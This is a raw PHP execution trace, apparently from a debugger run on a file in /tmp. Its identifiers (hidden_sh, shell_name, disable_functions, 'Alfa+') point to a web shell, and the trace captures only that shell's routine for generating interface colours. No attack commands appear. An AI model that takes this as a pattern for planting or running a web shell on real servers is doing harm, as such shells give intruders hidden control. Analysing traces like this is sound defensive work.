6	133	0	0.006399	435904	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'shell_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['.header' => 'border: 7px solid {color}', '#meunlist' => 'border-color: {color}', '#hidden_sh' => 'background-color: {color}', '.ajaxarea' => 'border: 1px solid {color}', '.foot' => 'border-color: {color}']]
6	133	1	0.006434	435904
6	133	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	134	0	0.006459	435904	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'border-color: {color}'
6	134	1	0.006475	436048
6	134	R			'border-color: #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border-color: #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '#meunlist{border-color: #0E304A}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '#hidden_sh'
6	135	0	0.006526	435928	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'shell_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['.header' => 'border: 7px solid {color}', '#meunlist' => 'border-color: {color}', '#hidden_sh' => 'background-color: {color}', '.ajaxarea' => 'border: 1px solid {color}', '.foot' => 'border-color: {color}']]
6	135	1	0.006560	435928
6	135	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	136	0	0.006584	435928	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'background-color: {color}'
6	136	1	0.006601	436080
6	136	R			'background-color: #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '#hidden_sh{background-color: #0E304A}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.ajaxarea'
6	137	0	0.006652	435968	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'shell_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['.header' => 'border: 7px solid {color}', '#meunlist' => 'border-color: {color}', '#hidden_sh' => 'background-color: {color}', '.ajaxarea' => 'border: 1px solid {color}', '.foot' => 'border-color: {color}']]
6	137	1	0.006686	435968
6	137	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	138	0	0.006711	435968	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'border: 1px solid {color}'
6	138	1	0.006727	436120
6	138	R			'border: 1px solid #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border: 1px solid #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.ajaxarea{border: 1px solid #0E304A}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.foot'
6	139	0	0.006793	436032	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'shell_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['.header' => 'border: 7px solid {color}', '#meunlist' => 'border-color: {color}', '#hidden_sh' => 'background-color: {color}', '.ajaxarea' => 'border: 1px solid {color}', '.foot' => 'border-color: {color}']]
6	139	1	0.006828	436032
6	139	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	140	0	0.006852	436032	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'border-color: {color}'
6	140	1	0.006869	436176
6	140	R			'border-color: #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border-color: #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.foot{border-color: #0E304A}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_vars'
6	141	0	0.006918	436024	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'header_vars'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#27979B'
6	141	1	0.006943	436024
6	141	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.header_vars{color: #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_values'
6	142	0	0.006990	436056	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'header_values'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#67ABDF'
6	142	1	0.007015	436056
6	142	R			'#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.header_values{color: #67ABDF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_on'
6	143	0	0.007062	436088	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'header_on'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#00FF00'
6	143	1	0.007086	436088
6	143	R			'#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.header_on{color: #00FF00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_off'
6	144	0	0.007132	436152	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'header_off'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#ff0000'
6	144	1	0.007156	436152
6	144	R			'#ff0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#ff0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.header_off{color: #ff0000;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_none'
6	145	0	0.007203	436152	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'header_none'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#00FF00'
6	145	1	0.007227	436152
6	145	R			'#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.header_none{color: #00FF00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'home_shell'
6	146	0	0.007273	436216	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'home_shell'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#ff0000'
6	146	1	0.007296	436216
6	146	R			'#ff0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#ff0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.home_shell{color: #ff0000;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'home_shell:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.home_shell:hover'
6	147	0	0.007358	436216	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'home_shell:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.home_shell:hover' => 'color: {color};']]
6	147	1	0.007389	436216
6	147	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	148	0	0.007413	436216	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	148	1	0.007429	436352
6	148	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.home_shell:hover{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'back_shell'
6	149	0	0.007477	436272	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'back_shell'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#efbe73'
6	149	1	0.007501	436272
6	149	R			'#efbe73'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#efbe73'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.back_shell{color: #efbe73;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'back_shell:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.back_shell:hover'
6	150	0	0.007559	436272	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'back_shell:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.back_shell:hover' => 'color: {color};']]
6	150	1	0.007589	436272
6	150	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	151	0	0.007613	436272	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	151	1	0.007629	436408
6	151	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.back_shell:hover{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_pwd'
6	152	0	0.007677	436336	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'header_pwd'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#00FF00'
6	152	1	0.007701	436336
6	152	R			'#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.header_pwd{color: #00FF00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_pwd:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.header_pwd:hover'
6	153	0	0.007758	436336	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'header_pwd:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.header_pwd:hover' => 'color: {color};']]
6	153	1	0.007789	436336
6	153	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	154	0	0.007825	436336	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	154	1	0.007943	436472
6	154	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.header_pwd:hover{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_drive'
6	155	0	0.007997	436464	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'header_drive'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#00FF00'
6	155	1	0.008028	436464
6	155	R			'#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.header_drive{color: #00FF00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_drive:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.header_drive:hover'
6	156	0	0.008088	436464	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'header_drive:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.header_drive:hover' => 'color: {color};']]
6	156	1	0.008119	436464
6	156	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	157	0	0.008143	436464	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	157	1	0.008159	436600
6	157	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.header_drive:hover{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_show_all'
6	158	0	0.008208	436464	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'header_show_all'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#00FF00'
6	158	1	0.008232	436464
6	158	R			'#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.header_show_all{color: #00FF00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'disable_functions'
6	159	0	0.008279	436464	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'disable_functions'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#ff0000'
6	159	1	0.008304	436464
6	159	R			'#ff0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#ff0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.disable_functions{color: #ff0000;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'footer_text'
6	160	0	0.008352	436592	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'footer_text'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#27979B'
6	160	1	0.008376	436592
6	160	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.footer_text{color: #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'menu_options'
6	161	0	0.008423	436592	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'menu_options'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#27979B'
6	161	1	0.008448	436592
6	161	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.menu_options{color: #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'menu_options:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.menu_options:hover'
6	162	0	0.008506	436592	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'menu_options:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#646464', 'multi_selector' => ['.menu_options:hover' => 'background-color: {color};font-weight: unset;']]
6	162	1	0.008539	436592
6	162	R			'#646464'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#646464'
6	163	0	0.008563	436592	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#646464'	'background-color: {color};font-weight: unset;'
6	163	1	0.008588	436768
6	163	R			'background-color: #646464;font-weight: unset;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #646464;font-weight: unset;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.menu_options:hover{background-color: #646464;font-weight: unset;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'options_list'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.content_options_holder .header center a'
6	164	0	0.008660	436760	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'options_list'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#00FF00', 'multi_selector' => ['.content_options_holder .header center a' => 'color: {color};']]
6	164	1	0.008692	436760
6	164	R			'#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#00FF00'
6	165	0	0.008716	436760	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#00FF00'	'color: {color};'
6	165	1	0.008732	436896
6	165	R			'color: #00FF00;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #00FF00;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.content_options_holder .header center a{color: #00FF00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'options_list:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.content_options_holder .header center a:hover'
6	166	0	0.008798	436720	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'options_list:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.content_options_holder .header center a:hover' => 'color: {color};']]
6	166	1	0.008830	436720
6	166	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	167	0	0.008854	436720	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	167	1	0.008870	436856
6	167	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.content_options_holder .header center a:hover{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'options_list_header'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.txtfont_header'
6	168	0	0.008932	436848	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'options_list_header'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#59cc33', 'multi_selector' => ['.txtfont_header' => 'color: {color};']]
6	168	1	0.008963	436848
6	168	R			'#59cc33'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#59cc33'
6	169	0	0.008987	436848	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#59cc33'	'color: {color};'
6	169	1	0.009003	436984
6	169	R			'color: #59cc33;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #59cc33;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.txtfont_header{color: #59cc33;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'options_list_text'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.txtfont,.tbltxt'
6	170	0	0.009063	436848	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'options_list_text'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.txtfont,.tbltxt' => 'color: {color};']]
6	170	1	0.009094	436848
6	170	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	171	0	0.009118	436848	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	171	1	0.009134	436984
6	171	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.txtfont,.tbltxt{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'Alfa+'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.alfa_plus'
6	172	0	0.009199	436848	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'Alfa+'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#06ff0f', 'multi_selector' => ['.alfa_plus' => 'color: {color};font-weight: unset;']]
6	172	1	0.009230	436848
6	172	R			'#06ff0f'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#06ff0f'
6	173	0	0.009254	436848	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#06ff0f'	'color: {color};font-weight: unset;'
6	173	1	0.009271	437008
6	173	R			'color: #06ff0f;font-weight: unset;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #06ff0f;font-weight: unset;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.alfa_plus{color: #06ff0f;font-weight: unset;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'hidden_shell_text'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '#hidden_sh a'
6	174	0	0.009336	436872	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'hidden_shell_text'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#00FF00', 'multi_selector' => ['#hidden_sh a' => 'color: {color};']]
6	174	1	0.009367	436872
6	174	R			'#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#00FF00'
6	175	0	0.009391	436872	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#00FF00'	'color: {color};'
6	175	1	0.009406	437008
6	175	R			'color: #00FF00;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #00FF00;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '#hidden_sh a{color: #00FF00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'hidden_shell_version'
6	176	0	0.009456	437104	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'hidden_shell_version'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#ff0000'
6	176	1	0.009480	437104
6	176	R			'#ff0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#ff0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.hidden_shell_version{color: #ff0000;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'shell_name'
6	177	0	0.009528	437104	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'shell_name'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#FF0000'
6	177	1	0.009552	437104
6	177	R			'#FF0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#FF0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.shell_name{color: #FF0000;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_row:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.main tr:hover'
6	178	0	0.009610	437104	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'main_row:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#646464', 'multi_selector' => ['.main tr:hover' => 'background-color: {color};']]
6	178	1	0.009641	437104
6	178	R			'#646464'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#646464'
6	179	0	0.009666	437104	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#646464'	'background-color: {color};'
6	179	1	0.009682	437256
6	179	R			'background-color: #646464;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #646464;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.main tr:hover{background-color: #646464;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_header'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.main th'
6	180	0	0.009748	437120	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'main_header'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.main th' => 'color: {color};']]
6	180	1	0.009778	437120
6	180	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	181	0	0.009802	437120	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	181	1	0.009818	437256
6	181	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.main th{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_name'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.main .main_name'
6	182	0	0.009877	437104	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'main_name'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.main .main_name' => 'color: {color};font-weight: unset;']]
6	182	1	0.009908	437104
6	182	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	183	0	0.009932	437104	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};font-weight: unset;'
6	183	1	0.009948	437264
6	183	R			'color: #FFFFFF;font-weight: unset;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;font-weight: unset;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.main .main_name{color: #FFFFFF;font-weight: unset;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_size'
6	184	0	0.010001	437128	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'main_size'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#67ABDF'
6	184	1	0.010026	437128
6	184	R			'#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#67ABDF'
